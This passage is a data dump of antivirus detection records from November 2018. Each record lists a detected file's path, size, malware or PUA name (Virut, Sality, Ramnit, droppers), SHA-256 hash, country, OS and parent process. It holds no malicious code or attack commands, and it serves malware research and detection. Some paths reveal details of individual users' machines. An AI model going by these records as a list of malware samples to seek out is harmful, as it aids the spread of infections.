  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='f57fafd6c96258b7f001059c4a66d6dc8e880b87c961cfd263bae0628c7a41ba', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lfs.exe', filepath='D:\\Games\\Live For Speed\\speed\\LFS.exe', filesize=2048000, name='W32/Jadtre.B.#M1.#R1'), hash='f595fad07af23d675645836760336d4a0da4d1c327123b5eb65cab485f9f67ba', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=35176, timestamp='2018-11-01T00:07:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f5b8e5c0803794289e72c405263c36d786adce9d1a15a7a8576168aec3d3a02e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F5B8E5C0803794289E72C405263C36D786ADCE9D1A15A7A8576168AEC3D3A02E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f5b8e5c0803794289e72c405263c36d786adce9d1a15a7a8576168aec3d3a02e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='daemontoolspro550-0388.exe', filepath='\\\\?\\F:\\Delphi Neu\\Delphi 2014.3 FULL\\Delphi 2014.3 FULL\\DAEMONToolsPro550-0388.exe', filesize=19904000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='f66a31e176ef3abc894ccde534753a48fe5ff4b75f094db7e9ae92163c6ee34d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='daemontoolspro550-0388.exe', filepath='F:\\Delphi Neu\\Delphi 2014.3 FULL\\Delphi 2014.3 FULL\\DAEMONToolsPro550-0388.exe', filesize=19904000, name='W32/Sality.AT.#M1.#R1'), hash='f66a31e176ef3abc894ccde534753a48fe5ff4b75f094db7e9ae92163c6ee34d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T11:34:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='daemontoolspro550-0388.exe', filepath='F:\\Delphi Neu\\Delphi 2014.3 FULL\\Delphi 2014.3 FULL\\DAEMONToolsPro550-0388.exe', filesize=19904000, name='W32/Sality.AT.#M1.#R1'), hash='f66a31e176ef3abc894ccde534753a48fe5ff4b75f094db7e9ae92163c6ee34d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T11:34:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corretivoretaguarda.exe', filepath='C:\\CHRautomacao\\Aplicativos\\CorretivoRetaguarda.exe', filesize=1280000, name='W32/Sality.AT.#M1.#R1'), hash='f6cd8420522ddddd622a4c20d9f26ee9fe651980cc84cd39a20daea05cb57040', metadata=Row(cmdline='-m:GeneralTel.dll -f:RunGeneralTelemetry  -cV MzR8X9qMPEanzCIx.1.1 -SendFullTelemetry -ThrottleUtc -FullSync', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-01T11:07:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='regfix.exe', filepath='\\\\?\\G:\\Game_Coll\\السمكة الجديدة\\resources\\regfix.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='f74bb75790a07202840a7b80c40b76cbd5aefd2440182efe4bfb9932b9ea0917', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:28:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cam.dll', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Nouveau dossier\\KilerRat v7.5.4 By Ahmed Ibrahim\\KilerRat v7.5.4\\Plugin\\cam.dll', filesize=64000, name='HEUR/AGEN.1032945.#M1.#R1'), hash='f7625119de43a747129977ae4bcb9a38a3bb49453afb1eafa3afaf2bc7308c05', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:13:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-075709-ea83ba09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_118d13bd\\AVSCAN-20181101-075621-E26C7D02\\AVSCAN-20181101-075709-EA83BA09', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:57:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00006935', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2216\\tmp00000187\\tmp00006935', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='\\\\\\/service', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\N-able Technologies\\AVDefender\\epsecurityservice.exe', parentsize=452944, timestamp='2018-11-01T16:30:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004ac2', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2216\\tmp00000187\\tmp00004ac2', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='\\\\\\/service', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\N-able Technologies\\AVDefender\\epsecurityservice.exe', parentsize=452944, timestamp='2018-11-01T15:54:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-100709-b45b76bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e417d959\\AVSCAN-20181101-100648-B0C31FE5\\AVSCAN-20181101-100709-B45B76BD', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:37:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150210-8e9a3129', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_15712619\\AVSCAN-20181101-145429-53974749\\AVSCAN-20181101-150210-8E9A3129', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:02:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='C:\\Downloads\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:30:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000bce1', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2216\\tmp00000187\\tmp0000bce1', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='\\\\\\/service', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\N-able Technologies\\AVDefender\\epsecurityservice.exe', parentsize=452944, timestamp='2018-11-01T18:29:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='\\\\200.200.200.171\\Users\\shahool\\Downloads\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T04:54:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000048c3', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2216\\tmp00000187\\tmp000048c3', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='\\\\\\/service', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\N-able Technologies\\AVDefender\\epsecurityservice.exe', parentsize=452944, timestamp='2018-11-01T15:51:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rrda4jr.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-2703089270-2420987216-934276835-1001\\$RRDA4JR.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESET\\ESET Security\\ekrn.exe', parentsize=2260144, timestamp='2018-11-01T15:18:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='C:\\Users\\X\\Downloads\\Programs\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T04:35:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='C:\\Users\\X\\Downloads\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:08:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f84fab65dfbd46b53fad092e8f3e303562a67e24a26f8fcb1c18b9cef54d4072', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\F84FAB65DFBD46B53FAD092E8F3E303562A67E24A26F8FCB1C18B9CEF54D4072', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f84fab65dfbd46b53fad092e8f3e303562a67e24a26f8fcb1c18b9cef54d4072', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:26:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125700-a0c3ddf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10311809\\AVSCAN-20181101-125624-9C1A5840\\AVSCAN-20181101-125700-A0C3DDF9', filesize=3968000, name='HEUR/APC.#M1.#R1'), hash='f858fcde6939c722a2343f8b3cca16ea55172e1dfe9968bbc06ef74a7532bc51', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:57:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='folder lock.exe', filepath="C:\\Program Files (x86)\\NewSoftware's\\Folder Lock\\folder lock.exe", filesize=3968000, name='HEUR/APC.#M1.#R1'), hash='f858fcde6939c722a2343f8b3cca16ea55172e1dfe9968bbc06ef74a7532bc51', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc="C:\\Program Files (x86)\\NewSoftware's\\Folder Lock\\folder lock.exe", parentsize=3968000, timestamp='2018-11-01T04:56:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_c2bcaee2_c8ae2729.exe', filepath='C:\\Users\\X\\Desktop\\Favorites\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_c2bcaee2_c8ae2729.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='f8ae2ddddb99dfa1e6b750bff51b221dd1a0a5f0fe281a29b0bd4fb17a7d45e5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:44:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f8c9945870f286a27b08f748783c0cab00d53822d7ae75b017c041219439a3be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F8C9945870F286A27B08F748783C0CAB00D53822D7AE75B017C041219439A3BE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f8c9945870f286a27b08f748783c0cab00d53822d7ae75b017c041219439a3be', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aiframe_data.exe', filepath='E:\\picture\\งานแต่งอิ๊ดลำปาง\\เหรียญโปรย\\viewdiary.php_files\\support_data\\aiframe_data\\aiframe_data.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='f9bf64adfca71c94a7c80a12db4e82f1fcf04e984420a3a5fe66bf0012ab281e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='emailloginnow.exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MOZ0BVF5\\EmailLoginNow.exe', filesize=652000, name='HEUR/AGEN.1020989.#M1.#R1'), hash='f9e17909eb9d92c55b55701c4b696472bd113945a88c191de6c694638193050d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:UVbEq6FHW0+5zmhW.1', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T16:50:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202159-35c28b35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1e3058ce\\AVSCAN-20181101-201812-0B8138CA\\AVSCAN-20181101-202159-35C28B35', filesize=1216000, name='TR/Patched.Gen.#M1.#R1'), hash='f9e8de58ee6501e4d26ccdfe60b0a188a3a01487bff45d2dfb923d19204f23f2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:22:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='38883.html', filepath='D:\\云赚打码\\cache\\businessidresultpage\\5236876885871\\38883.html', filesize=284000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='f9f336eaedefba6e0abf26642b3f77351be84dc77bd8061382e205170cb096b3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Program Files\\360se6\\Application\\360se.exe', parentsize=1190472, timestamp='2018-11-01T01:25:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f9ff2c44c5e8487f1a23d5a3c3a9563f100a301438990bf0d168ee4a9c70743e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F9FF2C44C5E8487F1A23D5A3C3A9563F100A301438990BF0D168EE4A9C70743E', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='f9ff2c44c5e8487f1a23d5a3c3a9563f100a301438990bf0d168ee4a9c70743e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:43:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-011437-63ff0f35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8076cd85\\AVSCAN-20181031-190013-AB75577F\\AVSCAN-20181101-011437-63FF0F35', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:14:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-215955-4ba06c34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8076cd85\\AVSCAN-20181031-190013-AB75577F\\AVSCAN-20181031-215955-4BA06C34', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T01:00:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-211001-bbbd4ca8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8076cd85\\AVSCAN-20181031-190013-AB75577F\\AVSCAN-20181031-211001-BBBD4CA8', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa213cde1532ba7160b21cc7598f6986416d51a307ba632107f7ca282b0acc5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FA213CDE1532BA7160B21CC7598F6986416D51A307BA632107F7CA282B0ACC5D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fa213cde1532ba7160b21cc7598f6986416d51a307ba632107f7ca282b0acc5d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa37753799dcdb649f99c3f7a9e33c670da40666dfb0c9721f2b33f6df96f677', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FA37753799DCDB649F99C3F7A9E33C670DA40666DFB0C9721F2B33F6DF96F677', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='fa37753799dcdb649f99c3f7a9e33c670da40666dfb0c9721f2b33f6df96f677', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:43:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa7496411dbaee0e9fa5071c85091c785300d2fad67c619fa89527ffc0f1cd6c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FA7496411DBAEE0E9FA5071C85091C785300D2FAD67C619FA89527FFC0F1CD6C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fa7496411dbaee0e9fa5071c85091c785300d2fad67c619fa89527ffc0f1cd6c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:27:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa8c074438a636b90c0177fe8a1bec87d9ebdbdbdb809699cfe0aee3ee94220f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FA8C074438A636B90C0177FE8A1BEC87D9EBDBDBDB809699CFE0AEE3EE94220F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fa8c074438a636b90c0177fe8a1bec87d9ebdbdbdb809699cfe0aee3ee94220f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:27:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gsxmli0290.dll', filepath='C:\\Program Files (x86)\\Common Files\\Trimble\\Remote Device Manager\\Converter\\GSXMLI0290.dll', filesize=2368000, name='W32/Ramnit.CD.#M1.#R1'), hash='faca802404d1a4598e9027c0fb062a86d0d6658fe6fe15742f78b07a6cf707af', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:27:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iusb3mon.exe', filepath='C:\\Program Files\\Intel\\Intel(R) USB 3.0 eXtensible Host Controller Driver\\Application\\iusb3mon.exe', filesize=328000, name='W32/Jeefo.A.#M1.#R1'), hash='fb14eb244b7bf5d1e164beadfaf557cadf00b5ea715d3ffe44d955431fdcf44b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-01T12:18:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fb35cffc8d58a245c149d5f9dbc29144a86ba1116cd3730149a53ad860d63cbe', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FB35CFFC8D58A245C149D5F9DBC29144A86BA1116CD3730149A53AD860D63CBE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fb35cffc8d58a245c149d5f9dbc29144a86ba1116cd3730149a53ad860d63cbe', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- 